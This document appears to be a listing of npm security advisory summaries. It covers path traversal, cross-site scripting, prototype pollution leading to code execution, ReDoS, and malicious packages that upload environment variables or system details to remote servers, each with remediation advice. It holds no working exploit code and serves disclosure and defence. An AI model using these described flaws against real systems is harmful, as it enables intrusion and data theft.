Configuration Override

Overview Versions of helmet-csp before to 2.9.1 are vulnerable to a Configuration Override affecting the application's Content Security Policy CSP. The package's browser sniffing for Firefox deletes the default-src CSP policy, which is the fallback policy. This allows an attacker to remove an...

Path Traversal

Overview All versions of @wturyn/swagger-injector are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the configured dist folder using relative paths. Recommendation No fix is currently available. Consider using an alternative...

Path Traversal

Overview All versions of swagger-injector are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the configured dist folder using relative paths. Recommendation No fix is currently available. Consider using an alternative package...

Cross-Site Scripting

Overview All versions of mavon-editor are vulnerable to Cross-Site Scripting. The package fails to sanitize entered input, allowing attackers to execute arbitrary JavaScript in a victim's browser. Recommendation No fix is currently available. Consider using an alternative package until a fix is...

Cross-Site Scripting

Overview All versions of snekserve are vulnerable to Cross-Site Scripting XSS. The package fails to sanitize filenames, allowing attackers to execute arbitrary JavaScript in the victim's browser through files with names containing malicious code. Recommendation No fix is currently available...

Prototype Pollution

Overview Versions of handlebars prior to 3.0.8 or 4.3.0 are vulnerable to Prototype Pollution leading to Remote Code Execution. Templates may alter an Objects' proto and defineGetter properties, which may allow an attacker to execute arbitrary code through crafted payloads. Recommendation Upgrade...

Regular Expression Denial of Service

Overview All versions of sql-injection are vulnerable to Regular Expression Denial of Service. The package processes a request's body with regular expressions that may take exponentially longer to execute for large inputs. Recommendation No fix is currently available. Consider using an alternativ...

Malicious Package

Overview All versions of evil-package contain malicious code. The package uploads the contents of process.env to example.com/log. Recommendation Remove the package from your environment. Given the host where the information was uploaded to there is no further indication of compromise. References...

Message Signature Bypass

Overview Versions of openpgp prior to 4.2.0 are vulnerable to Message Signature Bypass. The package fails to verify that a message signature is of type text. This allows an attacker to to construct a message with a signature type that only verifies subpackets without additional input such as...

Unintended Require

Overview All versions of larvitbase-www are vulnerable to an Unintended Require. The package exposes an API endpoint and passes a GET parameter unsanitized to an require call. This allows attackers to execute any .js file in the same folder as the server is running. Recommendation No fix is...

Cross-Site Scripting

Overview Versions of status-board prior to 10.0.1 are vulnerable to Cross-Site Scripting. The createPreviewButton function fails to sanitize the href attribute of a created tag. This may allow attackers to execute arbitrary JavaScript in a victim's browser. Recommendation Upgrade to version 10.0....

Cross-Site Scripting

Overview Versions of cyberchef prior to 8.31.3 are vulnerable to Cross-Site Scripting. In Text Encoding Brute Force the table rows are created by concatenating the value variable unsanitized in the HTML code. If this variable is controlled by user input it allows attackers to execute arbitrary...

Regular Expression Denial of Service

Overview Versions of simple-markdown prior to 0.5.2 are vulnerable to Regular Expression Denial of Service ReDoS. The SimpleMarkdown.defaultInlineParse function has significantly degraded performance when parsing inline code blocks. Recommendation Upgrade to version 0.5.2 or later. References -...

Path Traversal

Overview All versions of public are vulnerable to Path Traversal. This vulnerability allows an attacker to access files outside the webroot since it allows symlink navigation in the URL. Recommendation No fix is currently available. Do not use public in production or consider using an alternative...

Malicious Package

Overview This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server. Recommendation Remove the package from your environment. There are no indications of further compromise. References GitHub Advisory...

Malicious Package

Overview This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server. Recommendation Remove the package from your environment. There are no indications of further compromise. References GitHub Advisory...

Malicious Package

Overview This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server. Recommendation Remove the package from your environment. There are no indications of further compromise. References GitHub Advisory...

Malicious Package

Overview This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server. Recommendation Remove the package from your environment. There are no indications of further compromise. References GitHub Advisory...

Malicious Package

Overview This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server. Recommendation Remove the package from your environment. There are no indications of further compromise. References GitHub Advisory...

Malicious Package

Overview This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server. Recommendation Remove the package from your environment. There are no indications of further compromise. References GitHub Advisory...